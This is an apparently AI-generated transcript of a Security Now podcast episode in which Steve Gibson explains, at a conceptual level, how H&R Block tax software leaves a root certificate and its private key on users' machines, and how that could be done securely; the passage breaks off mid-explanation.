Transcripts

Security Now 1071 transcript

Please be advised this transcript is AI-generated and may not be word for word. Time codes refer to the approximate times in the ad-supported version of the show.

 

Mikah Sargent [00:00:00]:
Coming up on Security Now, Steve Gibson is here and I am filling in for Leo Laporte. We kick off the show with H&R Block's tax software. Well, it's doing something pretty wild, and Steve has a suggested fix for it. We also talk about what happens when breathalyzer firmware needs to be calibrated. Plus, Russians want Telegram and WhatsApp to return to Russia. And very important, we finally learn what bucket squatting means and what can be done to fix it. All of that plus so much more coming up on Security Now.

Steve Gibson [00:00:38]:
Podcasts you love from people you trust. This is TWiT.

Mikah Sargent [00:00:50]:
This is Security Now, episode 1071 with Steve Gibson and me, Mikah Sargent. Recorded Tuesday, March 24th, 2026. Bucket squatting. It's time for Security Now. And if you're hearing this voice and going, that's not Leo Laporte, well, good for you. You've got a good ear for voices. I am Mikah Sargent. Leo Laporte is not here with us this week.

Mikah Sargent [00:01:14]:
He'll be back, don't you worry. But until then, I am excited to be joined by the ever-knowledgeable Steve Gibson. Hello, Steve.

Steve Gibson [00:01:25]:
Mikah, great to be with you again. Uh, Leo told us last week that the RSA conference is going on in San Francisco, and so he and Lisa are there, shaking hands with, uh, past and present and maybe even future advertisers for absolutely security-related things. So, uh, glad to have you filling in for him.

Mikah Sargent [00:01:49]:
Uh, it's always a pleasure to get to join you.

Steve Gibson [00:01:51]:
Well, yeah, and you know, once upon a time when we had Father Robert, he was our, our, uh, backstop for Leo, and now we got you, so that's great.

Mikah Sargent [00:02:00]:
Yeah, good to be here. Now, so good, go.

Steve Gibson [00:02:05]:
I was just gonna say, this is Security Now episode 1071 for March 24th, 2026, 2 days as it happens before, uh, my 71st birthday. So, wow, uh, I will be— yeah, uh, I feel great.

Mikah Sargent [00:02:23]:
So good, happy early birthday!

Steve Gibson [00:02:26]:
And I'm glad we're doing Security Now episode 2000 before, uh, very much longer. Um, today's episode is titled Bucket Squatting. And this has nothing to do with like something you have to do when you're camping, uh, this is about an interesting problem that Amazon has had for years, which it turns out represents a surprisingly serious security vulnerability, which we're going to cover in detail. Um, but wow, there's a bunch of other really cool things that have happened in the last week. Um, it turns out that H&R Block's tax software— I think they call it the Enterprise 2025 tax stuff— is doing something that is so very wrong. Also, a cyberattack has hit a company called Intoxibloc, which provides breathalyzers to enable the ignition systems on automobiles whose drivers need to prove their sobriety before driving. That's an interesting story. We've also got Firefox, which as of today should be at Firefox 149, offering a free built-in VPN.

Steve Gibson [00:03:55]:
Also, TikTok and Meta's tracking pixels turn out to be doing much more than we believed. Russian citizens are begging to get their instant messaging back— you know, Telegram, WhatsApp, and so forth— which the Russian government has said no to: no messaging for you. Uh, we've also got the lack of wisdom of connecting your crypto wallet to an unknown service. Yet another— and what would a Security Now podcast be if we didn't have a Cisco CVSS of 10.0? Yes, you're just getting them confused at this point because there's so many of them. Uh, but Cisco's not alone. Ubiquiti also had a 10.0 CVSS critical flaw that needs to get patched. We got some interesting listener feedback.

Steve Gibson [00:04:45]:
And then what is exactly bucket squatting and what can be done to prevent it? So, you know, maybe we have some things to talk about this week. I don't know.

Mikah Sargent [00:04:56]:
Sounds like it. Sounds like there might be a few things to talk about. I'm looking forward to learning about bucket squatting. I'll tell you that. Uh, you know, it's, it's a good exercise move, surely. Works on the—

Steve Gibson [00:05:07]:
that's the thighs. That's true. Strengthen those whatevers.

Mikah Sargent [00:05:13]:
Yeah, exactly, the whatevers. Uh, but, but as you all know, this is the time where after our wonderful summary of what's to come, we take a moment to cut to an ad break, and Leo will be here for you for that.

Steve Gibson [00:05:30]:
Hi, Leo.

Leo Laporte [00:05:32]:
Hi, Mikah. Hi, Steve. Sorry I couldn't be here. I'm at RSA right now having a great time, I'm sure. But I did want to come back and tell you about our sponsor for this episode of Security Now, Hoxhunt. Actually, I'm meeting with them at RSA in just a little bit. As a security leader, uh, you've been there. The eye rolls during training.

Leo Laporte [00:05:51]:
You're making us do this. The one-size-fits-all phishing simulations that your employees spot a mile away. They don't learn anything from that. And that report button that gets ignored more often than not. Your programs are running, but they're not changing employee behavior. And isn't that what it's all about? Meanwhile, AI is making real attacks more convincing by the day, and leadership is starting to ask the question you don't have a clear answer to: is this actually working? Well, Hoxhunt is built to answer that. Hoxhunt empowers your employees to spot and stop phishing attacks. It drives measurable behavior change, and it does it in a fun way through personalized, gamified micro-training.

Leo Laporte [00:06:36]:
No more eye rolls. It's just engaging and fun, and it's how people learn. It's powered by AI and behavioral science, and you'll love it as an admin because Hoxhunt does all the heavy lifting. The simulations run automatically, and not just email. These days, you gotta be everywhere. They run in email, in Slack, and in Teams, like real phishing attacks personalized to each employee based on role, location, and behavior. Every simulation uses AI to mirror those real-world attacks, meaning employees are tested on what's actually getting through, not outdated templates they recognize immediately.

Leo Laporte [00:07:13]:
No messages from Nigerian princes. They know better than that now. Gamified training keeps engagement high without feeling punitive. Your employees will love it and you'll love it too. And because every interaction generates a coaching moment, you're not just tracking completion, you're building behavioral indicators that tell a real story. You get reporting rates, repeat clicker reduction, and time to report, the kind of metrics that hold up when leadership asks the hard questions. You could say, yeah, got it right here. You don't have to take my word for it.

Leo Laporte [00:07:49]:
With over 3,500 verified reviews on G2, Hoxhunt is the top-rated security training platform recognized for best results and easiest to use. It's also recognized as a customer's choice by Gartner, and thousands of companies use Hoxhunt. Qualcomm, DocuSign, Nokia— they trust Hoxhunt to train millions of employees worldwide. Visit hoxhunt.com/securitynow today to learn why modern secure companies are making the switch to Hoxhunt. That's hoxhunt.com/securitynow. Now back to the show.

Mikah Sargent [00:08:26]:
All right, thank you, Leo, uh, for that. Let us get into the show, the good stuff.

Steve Gibson [00:08:33]:
So, um, last week we— I showed this same picture that we have here, but with a different caption. I thought this picture was so bizarre that I would just put it out to our listeners to say, give me an idea for a caption. And so that was the caption contest last week. Um, I got flooded with a huge range of very fun and creative bits of feedback. I settled on one which I like because clearly what we're seeing here with this insane communications telephone pole, a power pole, whatever the hell it is, it's beautiful. This demonstrates like what, 50 years of accumulation? Clearly this did not happen in a day, right? Initially, when that pole was erected and the first lines were run to it, I'm sure down there in the core, buried deeply, is what was there originally. Beautiful. Probably made sense.

Steve Gibson [00:09:48]:
You could take a look at it and see what was going on. Everything, you know, it was like, it was perfect. Then like, oh, but wait a minute, we need to add another trunk line. So, okay, tack that onto the side and, and wire it in. And then who knows how many decades pass and you end up with what could, you know, affectionately be called a rat's nest of wires. So I gave this—

Mikah Sargent [00:10:15]:
it's a rat king's nest. You know what a rat king is?

Steve Gibson [00:10:18]:
Yeah. Yeah. I gave— and there's some poor worker guy up there on the top, like, trying to add just one more wire. I just need one more wire. Anyway, so I gave this thing the caption: a contemporary visualization of the Microsoft Windows codebase.

Mikah Sargent [00:10:38]:
This is the caption you added?

Steve Gibson [00:10:40]:
Yes, that's my caption.

Mikah Sargent [00:10:42]:
It's beautiful, Steve. I read that and I thought, yes, yes.

Steve Gibson [00:10:47]:
Oh, I think that— and I mean, that's what we see with Windows, right? I mean, and in all fairness, it's not just Windows. It's any old code base that has been evolving over time, where you can't really throw away the old code because it's working and things depend upon it being the way it is. So we're just going to add to it. And, you know, Windows now has multiple APIs. I hear Paul Thurrott talking about how, you know, oh, nobody codes to that API anymore. Well, of course I do, but not, uh, you know, other normal coders. So anyway, I thought this was a great caption. Uh, it's a variation on an idea that I got from one of our listeners, so thank you for that.

Steve Gibson [00:11:37]:
And thank you everyone for sharing your ideas. Okay, so this first goodie is where we're going to spend some time this morning— or this podcast— because there's a lot here to unpack, and I really think our listeners are going to find this interesting. Credit for the first mention goes to a listener, Jack Christiansen, who first pointed me at this. Since then, the Hacker News and other security outlets have picked up on this and shared it. Jack provided a note which included a link to the original Y Combinator posting, whose Chinese author is a guy named Yifan Lu, Y-I-F-A-N, last name Lu, L-U, Yifan Lu. He appears to know his way around TLS and web servers, as we will see. So here's what Yifan posted to Y Combinator last week. He said, just a— he said PSA, but we know that stands for public service announcement— for folks here in the US, because tax season is coming up and some of you may be using— it's Business, not Enterprise— H&R Block Business 2025.

Steve Gibson [00:13:06]:
He said, I discovered that the software— get a load of this, folks— I discovered, he wrote, that the software installs a root CA named WKATX Server Host 2024. So a root certificate authority, WKATX Server Host 2024, with an expiration in 2049. Yes, 23 years from now. He said, into your local machine's trusted root certificate store. They also helpfully include the private key to this certificate in a DLL file. He says this certificate does not identify itself as H&R Block anywhere and does not get uninstalled when you uninstall the software. He said, I've been able to successfully use this root CA plus mitmproxy, which is a software package, a man-in-the-middle proxy, to manipulate TLS traffic on a brand new virtual machine on the same network with a DNS spoofing attack.

Steve Gibson [00:14:35]:
And he then gives us a link in his posting to a YouTube video, and I've got the link in the show notes for anyone who's interested. He said, to test if your machine is vulnerable, visit this page. And now we have a URL to a host on his domain. It's https://hrbackdoor.yifanlu.com, hr as in, you know, H&R Block. So this is a TLS, an HTTPS secure connection to a web server on his domain that is carrying a certificate he made using this root CA that was installed in the machine of everyone who has H&R Block Business 2025, thanks to the fact that they also provided the private key for this root certificate, which should never be there. Anyway, he says, go to this URL. And if you do not get any warning or error message from your browser, then you have the backdoor installed.

Steve Gibson [00:16:01]:
Okay, now it's not really a backdoor. I understand. But I think that's a popular term. It's frightening and scary, as we'll see. I don't get how this is a backdoor, but it's not a good door. You know, maybe a side door. He said, if your browser does complain, you can choose to visit the page anyway for more details on the vulnerability. And I did.

Steve Gibson [00:16:31]:
And I'll tell you about what I found in a second. So he says, is it negligence or a real backdoor? It's impossible to tell. And since the private key is out there, anyone can use it, so the point is moot. He said, there's no legitimate reason— and boy do I agree, and as we'll see, I'm going to demonstrate how we don't need this— no legitimate reason why they need to install a wildcard root CA under a different name. When I contacted them, and I'll be sharing the timeline of that later, their statement included, quote, similar findings have been identified through internal security assessments, unquote. He said, meaning they know about this issue but have not fixed it. He said, I would not trust H&R Block software at this point.

Steve Gibson [00:17:32]:
If you did not get bit by this, congratulations. He said, see this post as a reminder to audit your trusted root CA store. In other words, take this post as a reminder to go take a look and see what cruft things may have installed behind your back for their own purposes. Because unfortunately, as this demonstrates, that can happen. And it's not good. Okay, so let's reverse engineer this to figure out what's going on here. First, um, I want to be very clear that having H&R Block install its own root certificate into the certificate authority root store of every single person who installs their tax preparation software— I mean, that's bad enough, but then even worse, to leave it there forever with an expiration date in the year 2049. And you know, Mikah, I do think the podcast will probably not last that long, so we're not going to be here to celebrate the expiration of the H&R Block root certificate.

Steve Gibson [00:18:51]:
Um, so this will remain valid for the next 23 years. Doing that on H&R Block's part is the height of hubris and irresponsibility.
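As a rough illustration of the audit Yifan recommends, here is a hedged Python sketch. The allowlist fragments and store contents below are hypothetical; on Windows the standard library's ssl.enum_certificates("ROOT") can supply the real store contents, though as DER blobs whose subjects you would still need to parse.

```python
import ssl  # on Windows, ssl.enum_certificates("ROOT") can read the root store

# Hypothetical allowlist: issuer-name fragments you expect in a root store.
# Real stores hold dozens of entries; extend this to taste.
EXPECTED = {"Microsoft", "DigiCert", "ISRG", "GlobalSign", "Sectigo"}

def flag_unexpected_roots(subject_names):
    """Return the subjects that match none of the expected fragments."""
    return [s for s in subject_names
            if not any(known in s for known in EXPECTED)]

# On Windows you could feed this real subject names parsed out of
# ssl.enum_certificates("ROOT"); here we simulate the store instead:
simulated_store = [
    "CN=DigiCert Global Root G2",
    "CN=Microsoft Root Certificate Authority 2011",
    "CN=WKATX Server Host 2024",  # the unexplained H&R Block root
]
print(flag_unexpected_roots(simulated_store))  # flags only the odd one out
```

This is only a first-pass filter, of course; a root you don't recognize isn't automatically malicious, but it is worth investigating.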

Mikah Sargent [00:19:05]:
I mean, I don't want a spoiler, so if you are going to talk about this, then you can just say that it'll be a spoiler. But I know that when it comes to the practically minded, particularly those in the security world, perhaps the motivation is not as important as the impact. But I would love to know: do you have any thoughts about why they'd make this choice of a certificate— is it just pure laziness? You talk about hubris and irresponsibility here. That just seems like, um, well, one would say that's a choice. I mean, they made a choice.

Steve Gibson [00:19:45]:
Yeah. And in fact, um, I'm going to explain—

Mikah Sargent [00:19:48]:
okay, good—

Steve Gibson [00:19:48]:
the dangers, and then I'm going to explain the reason for it, and then we're going to show how the same thing could be achieved in a completely secure fashion. So I've had a lot of fun with this, because in the 21 years of the podcast we've never seen this and gone into it. So it's a great opportunity to really dig in. Get ready, folks. Yes. Okay, so, um, remember that the way all this works is that a root certificate has signed itself and has declared itself to be a certificate authority certificate. Certificates have a whole bunch of ways they can be labeled, and they can also contain constraints on their own behavior. That is, constraints that they broadcast on what things they can be used for. So this is an unconstrained certificate authority certificate, which is the most important, most potent form of certificate you could have.

Steve Gibson [00:20:58]:
So just as with any root certificate authority certificate, the purpose of that self-signed certificate is to verify the signature of any other certificate that it might have signed using its matching private key. It contains the public key, so its private key signs something which the root certificate's public key can be used to verify. So it can verify, but it can't itself sign. That's the beauty of this public key division of labor between private and public keys. So the CA's private key consequently— like for DigiCert, right? They're a CA. Their private key is the most prized, protected, and safeguarded piece of information anywhere, since any certificate which that super secret protected private key signs will be trusted anywhere that its matching CA certificate containing its matching public key is installed. Okay, so keeping the private key secret is, like, so important. Did H&R Block at least keep its installed CA certificate private key secret? Well, no.
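The private-signs, public-verifies split Steve is describing can be seen in miniature with textbook RSA. The tiny numbers below are purely illustrative and wildly insecure; they only show why holding the public key lets you check a signature but never forge one.

```python
# Textbook RSA with toy numbers -- illustration only, never use in practice.
p, q = 61, 53
n = p * q                      # public modulus (part of the public key)
e = 17                         # public exponent (public key)
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)            # private exponent: the guarded secret (Python 3.8+)

def sign(digest, private_d):
    # Only the holder of the private exponent d can produce this value.
    return pow(digest, private_d, n)

def verify(digest, signature, public_e):
    # Anyone holding the public key (e, n) can check it, but not forge it.
    return pow(signature, public_e, n) == digest

digest = 1234                  # stand-in for a certificate's hash
sig = sign(digest, d)
print(verify(digest, sig, e))      # signature checks out
print(verify(digest + 1, sig, e))  # any tampering breaks it
```

A real CA does exactly this, just with 2048-bit or larger keys and proper padding, which is why the private exponent leaking in a DLL is catastrophic.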

Steve Gibson [00:22:30]:
Yifan told us no. Not even a little bit. This intrepid researcher discovered the CA certificate's never-to-be-disclosed matching private key sitting comfortably in a DLL that was included as part of this software's installation. We can be certain that this is true, since this researcher used the matching CA's private key, which he found in the DLL, to create and sign his own standard TLS web certificate, just like a CA would— like a certificate authority, like DigiCert did when GRC got its most recent certificate. That's what it does. So he created a TLS web certificate using the private key that he found in the DLL in order to create that hrbackdoor.yifanlu.com website, which anybody who installed the H&R Block software can now go to, because their browsers will all trust this certificate that he made for himself. When I went there, since I didn't install this H&R Block software, Firefox freaked out, as it should, warned me that the site was attempting to use an untrusted certificate signed by an unknown issuer and that I should proceed no further. I put the dialog box in the show notes.

Steve Gibson [00:24:09]:
It says— so this is from Firefox— someone could be trying to impersonate the site and you should not continue. Websites prove their identity via certificates, writes Firefox. Firefox does not trust hrbackdoor.yifanlu.com because its certificate issuer is unknown, meaning to my computer. Firefox said the certificate is self-signed or the server is not sending the correct intermediate certificates. And so then we get the error code SEC_ERROR_UNKNOWN_ISSUER. And you have a link, then you can click on View Certificate and see the certificate, where we see that everything Yifan Lu has told us is true. So this is all exactly what we would want and expect from any browser, and it's what we should receive because, as I said, I never made the mistake of installing H&R Block's 2025 tax prep software. But what's significant is that anyone who has ever previously installed H&R Block's Business 2025 tax prep software, from now and for the next 23 years, while that purposefully installed CA root certificate remains valid, would not and does not receive any warning or notification at all.

Steve Gibson [00:25:47]:
Their web browser simply opens that page without complaining— Yifan Lu's self-cert-created page— because the signer of Yifan's demo test site certificate will now be known and trusted by their PC, because once upon a time, maybe recently, maybe up to 23 years in the future, they had installed H&R Block's software. Okay, so, so far this is all just happy demonstration test land, right? The reason Yifan has raised the alarm is that the inherent dangers extend far beyond testing, since in addition to installing an untrustworthy certificate authority cert into every PC root store, as I said, and he's proven, H&R Block thoughtfully provided their CA's matching private key. Consequently, anyone anywhere in the world can generate their own TLS web certificates or code signing certificates— any kind of certificate, because there's no constraint on the use of this— that will be trusted without question by any previous user of H&R Block's tax preparation software, and for the next 23 years. For example, nothing prevents someone from signing a TLS certificate for www.google.com or update.microsoft.com or any other web domain they might choose. If traffic can then be rerouted to that maliciously named and now fully trusted server, anyone who had previously installed the H&R Block tax preparation software could be fully spoofed. Their browser would go to web pages at those URLs, and they would see matching trusted certificates. Now, presumably H&R Block has digitally signed their software, but any of their users who had previously installed their tax preparation software would also now be completely spoofable.
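The spoofing danger Steve describes can be reduced to a toy trust-store model. No real cryptography here, just the trust logic: a browser accepts a site certificate when, among many other checks, its issuer chains to a root in the local store. All names below are illustrative.

```python
# Toy model of why the installed root changes everything (not real crypto).
def browser_accepts(leaf_cert, root_store):
    """Grossly simplified chain check: is the leaf's issuer a trusted root?"""
    return leaf_cert["issuer"] in root_store

clean_store  = {"DigiCert Global Root G2"}               # a normal PC
victim_store = clean_store | {"WKATX Server Host 2024"}  # after the tax software

# A certificate anyone could mint with the leaked private key:
fake_google = {"subject": "www.google.com", "issuer": "WKATX Server Host 2024"}

print(browser_accepts(fake_google, clean_store))    # rejected: unknown issuer
print(browser_accepts(fake_google, victim_store))   # silently trusted
```

The asymmetry is the whole story: the same forged certificate is rejected everywhere except on machines carrying the extra root, where it is accepted without any warning.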

Steve Gibson [00:28:18]:
Their customers' PCs would download and blindly trust any subsequent software from any source that was signed with a certificate that had been issued with their private key. The code signing certificate could say H&R Block or it could say Microsoft Corporation or anything else that fit the malicious need of the moment. Yifan also said in his original Y Combinator posting, he said, quote, I've been able to successfully use this root CA and MITM proxy to manipulate TLS traffic on a brand new virtual machine on the same network with a DNS spoofing attack. So let's look at that. We've talked a lot about so-called middle boxes through the years. Many corporations use them to allow deliberate MITM, you know, man-in-the-middle interception, in order to examine 100% of the traffic that's passing into and out of their networks. They want to protect their employees inside their protected perimeter from anything malicious cruising into their network under the protection of TLS encryption. And they'd like to prevent corporate trade secrets from being sent out through their network, either inadvertently or deliberately.

Steve Gibson [00:29:54]:
Thanks to the same TLS encryption. So to accomplish this, every PC operating inside their corporate network environment must contain the root certificate for that middle box— in other words, a CA root certificate for that middle box. And we hope that its matching private key, well protected inside the middle box, is not extractable. So having all PCs in the enterprise containing that middle box's root certificate, with the middle box having the matching private key, which it's careful never to let anybody else get, allows the middle box to synthesize fake trusted remote website certificates on the fly. So here's how that works. Say that someone inside the enterprise attempts to go to chatgpt.com. The middle box will intercept that connection attempt, and it itself will go to chatgpt.com on behalf of the user to obtain ChatGPT's TLS certificate as if it were a user connecting.

Steve Gibson [00:31:20]:
It will duplicate many of the details of ChatGPT's certificate, but it will sign that new cloned certificate with its own internal private key. And it will then return that cloned certificate to the enterprise user, who will believe they've connected directly and privately to ChatGPT. Their browser will show openai.com or chatgpt.com or whatever the URL is. However, they've actually connected to their enterprise's middle box, which is masquerading as ChatGPT, which it can do because their PC contains that root CA for the middle box. Therefore, middle-box-created certificates are trusted inherently. Um, now all of this may seem like a lot to go through, but it's the only thing that allows the enterprise to monitor the TLS-encrypted communications of its employees, to prevent them from, for example, uploading the company's 10-year product plans in order to ask ChatGPT what it thinks about those plans. Those should not leave the enterprise, so somebody needs to guard those communications.
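The middle-box clone-and-re-sign flow Steve walks through can be sketched as a toy model. Again, no real cryptography, just the logic; the CA names are made up for illustration.

```python
# Toy sketch of TLS-interception middle-box behavior (no real crypto).
def middlebox_clone(real_cert, middlebox_ca):
    """Fetch-and-reissue: copy the site's details, re-sign under our own CA."""
    clone = dict(real_cert)
    clone["issuer"] = middlebox_ca   # the only field that changes
    return clone

def browser_trusts(cert, root_store):
    """Simplified chain check: is the issuer in the local root store?"""
    return cert["issuer"] in root_store

real_cert = {"subject": "chatgpt.com", "issuer": "DigiCert Global Root G2"}
clone = middlebox_clone(real_cert, "Corp Middlebox CA")

employee_store = {"DigiCert Global Root G2", "Corp Middlebox CA"}  # inside the enterprise
outside_store  = {"DigiCert Global Root G2"}                       # everyone else

print(clone["subject"])                        # looks identical to the real site
print(browser_trusts(clone, employee_store))   # accepted inside the perimeter
print(browser_trusts(clone, outside_store))    # rejected anywhere else
```

Which is exactly why the H&R Block root is so alarming: it grants this same interception capability, but on home machines, to anyone holding the leaked key.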

Steve Gibson [00:32:48]:
Um, Yifan's point about the installation of a root certificate and man-in-the-middle proxy is that, for reasons that are not at all clear, H&R Block has thereby, by doing what they've done, given themselves all of the same privileges and capabilities as any enterprise middle box on their customers' computers. The question is why?

Mikah Sargent [00:33:23]:
Too much power.

Steve Gibson [00:33:25]:
Yes. They could intercept all of their customers' communications to any other website.

Mikah Sargent [00:33:34]:
Oh my God, why would you want that? Yes, level—

Steve Gibson [00:33:37]:
why would you want the responsibility?

Mikah Sargent [00:33:39]:
Yeah, having that—

Steve Gibson [00:33:40]:
I like—

Mikah Sargent [00:33:41]:
yeah, thank you.

Steve Gibson [00:33:44]:
The only reason H&R Block would need to include the private key that matches the CA root certificate they installed into their users' machines would be if they needed to create and sign TLS certificates on the fly that would be trusted by that user's machine. I don't see any other possible need for the private key being locally present as it is. So again, why? Why is it H&R Block have given themselves the capability for wholesale, local machine, invasive traffic interception and decryption? There doesn't appear to be any reason why tax preparation software would need anything like this. And even if we trust H&R Block and assume that they must have some justifiable basis for having given themselves this capability on every one of their customers' machines that have installed their software, as Yifan himself demonstrated, they will also have given anyone else— anyone else like him, this researcher, who is aware of this— the same privileges, since the CA root cert is installed and its matching private key is sitting in a DLL for anyone to extract and use. I mentioned at the top that we were going to reverse engineer this in an attempt to understand what's going on. I haven't seen this H&R Block software, and I don't want to let it anywhere near any of my machines, right? So I have not watched it work. But the only reason I can see that they would do this would be if their software installs and runs a local web server in their user's machine. This would allow them to have a fully web-browser-based user interface and a UI-free headless web server that encapsulates all of their tax preparation logic.

Steve Gibson [00:36:16]:
In other words, we go to Google Docs in order to use Google's document application. It would be possible to instead go to H&R Block's software server with our browser running on our machine, to use their tax prep application delivered to us by a server running locally. So clicking, for example, some sort of little startup app would invoke the Windows shell to launch the user's default web browser with a URL like https://127.0.0.1: and then some port number, 1234 or some custom port number, whatever they wanted to use. Or they might have also tweaked the user's hosts file to map a more friendly looking domain name like hrblock-tax-prep.com to the 127.0.0.1 IP. That way users would see something comforting in their web browser's URL address bar. But none of that actually explains why they couldn't then just install a root CA and a certificate for that. There's no need to make it up on the fly.
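The hypothetical local-server design Steve is sketching, a headless app serving its UI to the user's own browser over loopback, looks roughly like this in Python. This is plain HTTP purely for illustration; serving HTTPS instead is precisely where a locally trusted certificate, and hence H&R Block's root-CA maneuver, would enter the picture. The handler, page content, and function names are all invented for the sketch.

```python
# Minimal sketch of a "local app served to your own browser" pattern.
import http.server
import threading
import urllib.request
import webbrowser  # a real app would use this to pop the default browser

class TaxAppHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        body = b"<h1>Hypothetical tax-prep UI</h1>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # silence per-request logging for the demo
        pass

def serve_and_fetch():
    # Bind to port 0 so the OS picks a free port, as an installer might.
    server = http.server.HTTPServer(("127.0.0.1", 0), TaxAppHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    url = f"http://127.0.0.1:{server.server_port}/"
    # webbrowser.open(url)  # this is the "clicking the startup app" step
    page = urllib.request.urlopen(url).read()
    server.shutdown()
    return page

print(serve_and_fetch())
```

The design itself is a legitimate, common pattern; the trouble only begins with how the local server's TLS certificate gets trusted.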

Steve Gibson [00:37:54]:
I mean, I'm kind of like, I'm giving them the benefit of every possible excuse here.

Leo Laporte [00:38:00]:
Okay.

Steve Gibson [00:38:00]:
So now the user clicks on the startup app, which launches their web browser, which accesses their locally running web server. That built-in local web server needs to present their browser with a TLS certificate that matches the address they've accessed— again, 127.0.0.1 or hrblock-tax-prep.com or whatever. Whatever the case, that certificate needs to be trusted by the browser. This means that it must have been signed by the private key that matches the root CA certificate that H&R Block planted into every user's PC. Since that root certificate's subject name, as Yifan told us, is WKATX Server Host 2024, it seems unlikely that it would be used directly as the server's end certificate. That would be a weird string for users to see in their browser's URL bar.

Steve Gibson [00:39:09]:
It's more likely that the installation process, or perhaps the first time you run the system, would create the built-in web server certificate, which it would then have signed using the root CA's private key, which we know is sitting in a DLL. And this is exactly, as I said, what Yifan Lu did when he created his test site. Once all this was done, the built-in web server would offer the user's browser this custom-minted TLS certificate, and it would use that certificate's private key, which the web server must have, to verify its valid ownership of the certificate it provided to the browser. The point I want to make here is that any web server that's accepting and terminating TLS connections does need to have the private key that matches the public key in the certificate which it provides to the web browser. But that should never be the private key for the CA root certificate. No one does that, right? The only thing the root signs is another certificate, which is then presented to the web browser. The root itself is never used directly, thus you never need its private key to be around. Okay, so when Yifan found all this, he did the right thing and reported his astonishment and concerns to H&R Block.

Steve Gibson [00:40:58]:
The timeline of his interactions with them began on March 10th. So today's what, the 24th? So 2 weeks ago today, on the 10th, he disclosed to H&R Block through their responsible disclosure policy. 2 days later, on March 12th, he was asked to, quote, please provide more details about how an attacker would realistically exploit this in practice, unquote, and, quote, share the video proof of concept from start to end, unquote. 3 days later, on the 15th, he did that, providing H&R Block with details and a proof-of-concept video, and telling them the deadline for their response was March 20th due to U.S. tax season coming up. On the 20th, he received the following statement back from H&R Block: After review with the program team, we're closing this report as out of scope. The reported issue involves an executable application that falls outside our defined program scope, and similar findings have been identified through internal security assessments.

Steve Gibson [00:42:25]:
Okay, what? So like, yeah, we know. Like, uh, really? Somebody actually explained this to you and you're like, eh, that's how it's supposed to work? Okay, so this is obviously pretty much a head-buried-in-the-sand response, right? They deserve to receive full scrutiny over this very wrong-headed design of their system, and I hope they receive that. There can be no doubt that the use of their tax preparation software leaves an uninvited, unwanted, and unconstrained root certificate, with a 23-year lifetime remaining and its known private key, sitting in the root store of every customer of their tax preparation software, and it persists even after their software has been uninstalled. Okay, now the one thing we've not examined is what I would do, I, Steve Gibson, if I were told, you know, or if I were contracted to do this in a secure fashion. So, Mikah, let's take a break and then we're going to look at that, how to do this right.

Mikah Sargent [00:43:52]:
I am looking forward to hearing how we can do it right after seeing how you can do it so, so wrong. But let's take a break. Uh, Leo Laporte joining us for the next sponsor.

Leo Laporte [00:44:04]:
Hi guys, real quick, this episode of Security Now brought to you by GuardSquare. Mobile apps today— well, you just listen to the show, you know they've become an inescapable part of life. We use them all the time, ranging from financial services to healthcare, retail, entertainment. And of course, users trust mobile apps with their sensitive personal data. But a recent survey showed that 72% of organizations experienced a mobile application security incident last year, and 92% of respondents reported rising threat levels over the last 2 years. Doesn't take a survey to know that, right? Now, if you're an app developer, you got to remember your users are trusting you and attackers want your users' personal data. So they're constantly finding new ways to attack your mobile app. This is one really awful thing they do.

Leo Laporte [00:44:56]:
They reverse engineer it— easy now using, uh, AI. They'll repackage it. They'll distribute your app, modified, via phishing campaigns, via sideloading, by third-party app stores— any means necessary. And then your users get compromised, and who do they blame? They blame you. But by taking a proactive approach to mobile app security, you can stay one step ahead of these attacks and maintain the trust of your users. That's where GuardSquare comes in. GuardSquare delivers mobile app security without compromise, providing advanced protections for both Android and iOS apps, combined with automated mobile application security testing to find vulnerabilities and real-time threat monitoring to gain insight into attacks.

Leo Laporte [00:45:43]:
You're not helpless anymore. Discover more about how GuardSquare provides industry-leading security for your mobile apps at guardsquare.com. That's guardsquare.com. We thank them so much for supporting Security Now. And now back to Micah and Steve.

Mikah Sargent [00:46:00]:
Guys, thank you very much, Leo, for that. Uh, we are joined once again by Steve Gibson as we continue on with understanding what we would do if tasked with fixing things for H&R Block.

Steve Gibson [00:46:13]:
Okay, so first of all, let me reiterate that I'm trying to give these guys every benefit of the doubt. I don't understand why they've done this. Um, the only real reason I can imagine is actually traffic interception. They would need this in order to act like a middlebox to intercept encrypted communications. Maybe— and again, I've not seen the software— maybe they set themselves up, and then their app says, okay, now go to irs.com, go to your bank's website— I mean, maybe there are remote cloud-based sources of information which it asks you to look at, while intercepting your communication so that it can suck that stuff in and incorporate it into your tax preparation. I don't know. That's the only thing I can imagine. Still horrible.

Steve Gibson [00:47:29]:
I mean, you don't want a proxy that's able to intercept all of your TLS connections installed on your machine, let alone left behind after you've uninstalled it. But that's the only thing I can imagine. Also, if all they wanted was to be able to run a local web server that your browser trusts, then they would need to install their own root cert, and the web server would then have a certificate that that root cert has signed. But there would never be the root cert's private key, because it wouldn't be necessary. And the only thing that certificate would do would be to serve a local web app. You know, web app developers do this all the time. They run a local web server on their machine. It's not a big deal. So H&R Block could have done that, if that's all they needed to do, and it could have been safe.

Steve Gibson [00:48:36]:
But say that for some reason they did need to deploy this on the fly. Even that could be done securely, and here's how. If I wished to deploy a product that included a built-in web server that a user's modern, fully secured web browser could interact with, without raising any warnings about insecure connections, lack of trust, self-signed certificates, and so on, it's possible. So, H&R Block, are you listening? Upon installation, the installing software would first generate a state-of-the-art standard 4096-bit public-private key pair. It would not ship that with the product. In other words, the thing that H&R Block did was provide a public key in a root CA and the private key bound into the DLL. They shipped those statically.

Steve Gibson [00:49:45]:
Which means anyone who gets a copy of one has what they need for all H&R Block users, which is where the problem is. No, instead, generate it on the fly. Generate your own 4096-bit key pair on the fly so that no two installations ever share the same keys. The public key half would be contained within, to your point, a short-lived root certificate having a lifetime of the expected duration of the product's use, maybe 90 or 120 days for tax preparation software. Micah, as you pointed out, there's no reason for it to live any longer.

Mikah Sargent [00:50:34]:
Yeah, especially because if they uninstall it or something, the theory is they're going to install it again and use it again next year.

Steve Gibson [00:50:42]:
